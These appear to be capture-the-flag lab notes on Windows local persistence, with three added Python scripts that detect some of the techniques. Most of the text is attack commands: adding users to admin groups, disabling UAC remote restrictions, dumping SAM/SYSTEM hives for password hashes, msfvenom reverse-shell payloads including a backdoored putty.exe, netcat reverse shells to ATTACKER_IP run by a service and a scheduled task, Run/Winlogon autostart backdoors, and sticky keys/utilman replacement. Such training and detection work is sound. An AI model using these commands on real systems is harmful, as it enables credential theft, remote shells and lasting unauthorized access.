Local Persistence

(LP1) - Tampering With Unprivileged Accounts

Assign Group Memberships 1

  • add unprivileged user to "Administrators" group
    net localgroup administrators thmuser0 /add

Assign Group Memberships 2

  • add unprivileged user to "Backup Operators" group
  • add unprivileged user to "Remote Desktop Users" group
  • add unprivileged user to "Remote Management Users" group
  • disable UAC remote restrictions (LocalAccountTokenFilterPolicy = 1) so the Backup Operators privileges are not filtered out of remote (WinRM) logons
    net localgroup "Backup Operators" thmuser1 /add
    net localgroup "Remote Desktop Users" thmuser1 /add
    net localgroup "Remote Management Users" thmuser1 /add
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
  • connect via evil-winrm (TARGET_IP is a placeholder for the target host)
  • dump the SAM and SYSTEM registry hives and download them
    evil-winrm -i TARGET_IP -u thmuser1 -p Password321
    reg save hklm\system system.bak
    reg save hklm\sam sam.bak
    download system.bak
    download sam.bak
  • get user hashes from the saved hives with Impacket's secretsdump
    /opt/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL

Special Privileges and Security Descriptors

  • assign privileges to user
    • SeBackupPrivilege: The user can read any file in the system, ignoring any DACL in place.
    • SeRestorePrivilege: The user can write any file in the system, ignoring any DACL in place.
  • export the current user rights assignment configuration
    secedit /export /cfg config.inf
  • edit file and add user
    SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551,thmuser2
    SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-551,thmuser2
  • We finally convert the .inf file into a .sdb file which is then used to load the configuration back into the system
    secedit /import /cfg config.inf /db config.sdb
    secedit /configure /db config.sdb /cfg config.inf
  • You should now have a user with equivalent privileges to any Backup Operator
  • To open the configuration window for WinRM's security descriptor, you can use the following command in PowerShell (you'll need to use the GUI session for this):
    Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI

This will open a window where you can add thmuser2 and assign it full privileges to connect to WinRM
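To audit for this kind of tampering from the defender's side, the following added example (not part of the original notes) parses the [Privilege Rights] section of a secedit /export file and flags any principal other than the default Administrators (S-1-5-32-544) and Backup Operators (S-1-5-32-551) SIDs that holds SeBackupPrivilege or SeRestorePrivilege. The embedded .inf text is constructed sample data; a real export is UTF-16 and must be opened with encoding "utf-16".

```python
# Constructed sample of a `secedit /export /cfg config.inf` file (real exports are
# UTF-16 and contain many more sections); thmuser2 has been appended as in the notes.
SAMPLE_INF = """[Unicode]
Unicode=yes
[Privilege Rights]
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551,thmuser2
SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-551,thmuser2
SeShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-545
[Version]
signature="$CHICAGO$"
Revision=1
"""

# Default holders of the backup/restore rights on a workstation:
# S-1-5-32-544 = Administrators, S-1-5-32-551 = Backup Operators.
DEFAULT_HOLDERS = {"*S-1-5-32-544", "*S-1-5-32-551"}
SENSITIVE_RIGHTS = ("SeBackupPrivilege", "SeRestorePrivilege")


def parse_privilege_rights(inf_text):
    """Return {right_name: [principal, ...]} from the [Privilege Rights] section."""
    rights = {}
    in_section = False
    for line in inf_text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_section = line.lower() == "[privilege rights]"
            continue
        if in_section and "=" in line:
            name, _, value = line.partition("=")
            rights[name.strip()] = [p.strip() for p in value.split(",") if p.strip()]
    return rights


def unexpected_holders(inf_text, rights=SENSITIVE_RIGHTS, allowed=DEFAULT_HOLDERS):
    """List (right, principal) pairs where a non-default principal holds a sensitive right."""
    parsed = parse_privilege_rights(inf_text)
    findings = []
    for right in rights:
        for principal in parsed.get(right, []):
            if principal not in allowed:
                findings.append((right, principal))
    return findings


if __name__ == "__main__":
    # On a live host: open("config.inf", encoding="utf-16").read() instead of SAMPLE_INF
    for right, who in unexpected_holders(SAMPLE_INF):
        print(f"{right} granted to non-default principal: {who}")
```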

RID Hijacking


(LP2) - Backdooring Files

Executable files

msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=ATTACKER_IP lport=4444 -b "\x00" -f exe -o puttyX.exe

Shortcut Files

  • backdoor script (C:\Windows\System32\calc-backdoor.ps1) that starts a reverse shell; ATTACKER_IP is a placeholder
    Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe ATTACKER_IP 4445"
  • Link Target of the modified shortcut
    powershell.exe -WindowStyle hidden C:\Windows\System32\calc-backdoor.ps1

Hijacking File Associations


(LP3) - Abusing Services

Creating backdoor services

  • create the backdoor service binary (ATTACKER_IP is a placeholder)
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe-service -o rev-svc.exe
  • create and start that service on Windows
    sc.exe create THMservice2 binPath= "C:\windows\rev-svc.exe" start= auto
    sc.exe start THMservice2

(LP4) - Abusing Scheduled Tasks

Create new task

  • create a task that runs every minute as SYSTEM (ATTACKER_IP is a placeholder)
    schtasks /create /sc minute /mo 1 /tn THM-TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe ATTACKER_IP 4449" /ru SYSTEM
  • confirm creation
    schtasks /query /tn thm-taskbackdoor

(LP5) - Logon Triggered Persistence

Startup folder

  • drop backdoor into the Startup folder (per-user or all-users)
    • C:\Users\<your_username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
    • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
  • generate the backdoor (ATTACKER_IP is a placeholder)
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4450 -f exe -o revshell.exe

Run / RunOnce

  • You can also force a user to execute a program on logon via the registry.
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    • HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
    • HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    • HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
  • Let's then create a REG_EXPAND_SZ registry entry under one of those keys
    • with MyBackdoor name
    • with C:\Windows\backdoor.exe value


Another alternative to automatically start programs on logon is abusing Winlogon, the Windows component that loads your user profile right after authentication (amongst other things).

Winlogon uses some registry keys under HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ that could be interesting to gain persistence.

  • Edit the Userinit record and append the backdoor to it
    • New value = C:\Windows\system32\userinit.exe, C:\Users\Administrator\Downloads\rev-svc6.exe

Logon scripts

  • create a new record under Computer\HKEY_CURRENT_USER\Environment
  • Let's then create a REG_EXPAND_SZ registry entry there
    • with UserInitMprLogonScript name
    • with C:\Windows\backdoor.exe value
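The three registry locations above (Run/RunOnce, Winlogon Userinit, and the UserInitMprLogonScript environment value) can be reviewed together from the output of reg query. The following added example (not part of the original notes) parses constructed reg query output, reports every Run/RunOnce entry for review, flags a Userinit value that lists anything other than the default userinit.exe, and flags a UserInitMprLogonScript value; it assumes the standard reg query layout of four-space separated name, type and data columns.

```python
import re

# Constructed sample of `reg query <key>` output for the keys the notes touch; the
# Userinit value, a Run entry and the logon-script value are tampered as described above.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,C:\Users\Administrator\Downloads\rev-svc6.exe
    Shell    REG_SZ    explorer.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\thm\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    MyBackdoor    REG_EXPAND_SZ    C:\Windows\backdoor.exe

HKEY_CURRENT_USER\Environment
    Path    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Microsoft\WindowsApps
    UserInitMprLogonScript    REG_EXPAND_SZ    C:\Windows\backdoor.exe
"""

# reg query prints each value as: 4 spaces, name, 4 spaces, type, 4 spaces, data
VALUE_RE = re.compile(r"^\s{4}(\S+)\s{4}(REG_\w+)\s{4}(.*)$")
DEFAULT_USERINIT = r"c:\windows\system32\userinit.exe"


def parse_reg_query(text):
    """Return {key_path: {value_name: (type, data)}} from reg query output."""
    keys, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = line.strip()
            keys[current] = {}
        elif current is not None:
            m = VALUE_RE.match(line)
            if m:
                keys[current][m.group(1)] = (m.group(2), m.group(3))
    return keys


def logon_persistence_findings(text):
    """List (reason, data) pairs for logon-triggered autostart locations worth reviewing."""
    findings = []
    for key, values in parse_reg_query(text).items():
        k = key.lower()
        if k.endswith(r"\winlogon"):
            data = values.get("Userinit", ("", ""))[1]
            entries = [e.strip().lower() for e in data.split(",") if e.strip()]
            if entries != [DEFAULT_USERINIT]:   # default is userinit.exe alone (trailing comma)
                findings.append(("Winlogon Userinit modified", data))
        elif k.endswith(r"\run") or k.endswith(r"\runonce"):
            for name, (_, data) in values.items():
                findings.append((f"autorun {name}", data))
        elif k.endswith(r"\environment") and "UserInitMprLogonScript" in values:
            findings.append(("UserInitMprLogonScript set", values["UserInitMprLogonScript"][1]))
    return findings


if __name__ == "__main__":
    for reason, data in logon_persistence_findings(SAMPLE_REG_QUERY):
        print(f"{reason}: {data}")
```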

(LP6) - Backdooring the Login Screen / RDP

Sticky Keys

takeown /f c:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

  • now, after pressing SHIFT 5 times on the lock screen, Windows will execute the binary cmd.exe


Utilman

Utilman is a built-in Windows application used to provide Ease of Access options during the lock screen.

takeown /f c:\Windows\System32\utilman.exe
icacls C:\Windows\System32\utilman.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
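Both of the replacements above leave an accessibility binary that is byte-identical to cmd.exe, which is easy to check for. The following added example (not part of the original notes) hashes the accessibility helpers in a System32 directory and reports any that match cmd.exe; it goes slightly beyond the notes by also covering osk.exe, narrator.exe and magnify.exe, and the fake System32 it builds for the demo is constructed data, not real binaries.

```python
import hashlib
import tempfile
from pathlib import Path

# Accessibility helpers reachable from the lock screen; the notes replace the first two.
ACCESSIBILITY_BINARIES = ("sethc.exe", "utilman.exe", "osk.exe", "narrator.exe", "magnify.exe")


def sha256_of(path):
    """SHA-256 of a file, read in chunks so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def replaced_accessibility_binaries(system32):
    """Return names of accessibility binaries under system32 that are byte-identical to cmd.exe."""
    system32 = Path(system32)
    cmd = system32 / "cmd.exe"
    if not cmd.is_file():
        return []
    cmd_hash = sha256_of(cmd)
    return [name for name in ACCESSIBILITY_BINARIES
            if (system32 / name).is_file() and sha256_of(system32 / name) == cmd_hash]


def build_demo_system32(root, tamper=True):
    """Construct a fake System32 (demo data); with tamper=True sethc.exe is a copy of cmd.exe."""
    root = Path(root)
    root.mkdir(parents=True, exist_ok=True)
    (root / "cmd.exe").write_bytes(b"MZ fake cmd.exe contents")
    sethc = b"MZ fake cmd.exe contents" if tamper else b"MZ fake sethc.exe contents"
    (root / "sethc.exe").write_bytes(sethc)
    (root / "utilman.exe").write_bytes(b"MZ fake utilman.exe contents")  # untouched
    return root


def demo_findings(tamper=True):
    """Run the check against a freshly constructed fake System32 and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return replaced_accessibility_binaries(build_demo_system32(tmp, tamper))


if __name__ == "__main__":
    # On a live host: replaced_accessibility_binaries(r"C:\Windows\System32")
    print(demo_findings())  # ['sethc.exe']
```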